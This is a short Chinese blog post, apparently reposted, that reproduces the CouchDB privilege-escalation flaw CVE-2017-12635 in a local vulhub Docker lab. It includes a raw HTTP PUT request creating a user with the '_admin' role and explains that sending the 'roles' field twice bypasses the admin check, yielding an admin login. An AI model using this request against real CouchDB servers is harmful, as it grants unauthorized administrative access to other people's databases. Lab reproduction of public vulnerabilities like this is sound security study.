Couchdb 垂直权限绕过漏洞(CVE-2017-12635)复现

Couchdb 垂直权限绕过漏洞(CVE-2017-12635)复现,第1张

前提:搭建好docker环境,安装vulhub
漏洞复现:

  1. 进入CVE-2017-12635漏洞目录,启动docker服务
    service docker start

  2. 启动漏洞环境
    sudo docker-compose up -d

  3. 查看容器状态,发现5984端口开启
    sudo docker ps

  4. 访问localhost:5984/_utils/,查看环境是否搭建成功,如下图即成功搭建

  5. 构造发送一个正常的添加用户数据包

PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: 172.18.0.1:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 92
{
  "type": "user",
  "name": "vulhub",
  "roles": ["_admin"],
  "password": "vulhub"
}

服务器返回错误,显示只允许admin添加用户

  1. 重复发送roles参数,成功绕过限制,创建用户vulhub
  2. 尝试用vulhub/vulhub登录,登陆成功
  3. 关闭镜像
    sudo docker-compose down -v

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/langs/790738.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-05-05
下一篇 2022-05-05

发表评论

登录后才能评论

评论列表(0条)

保存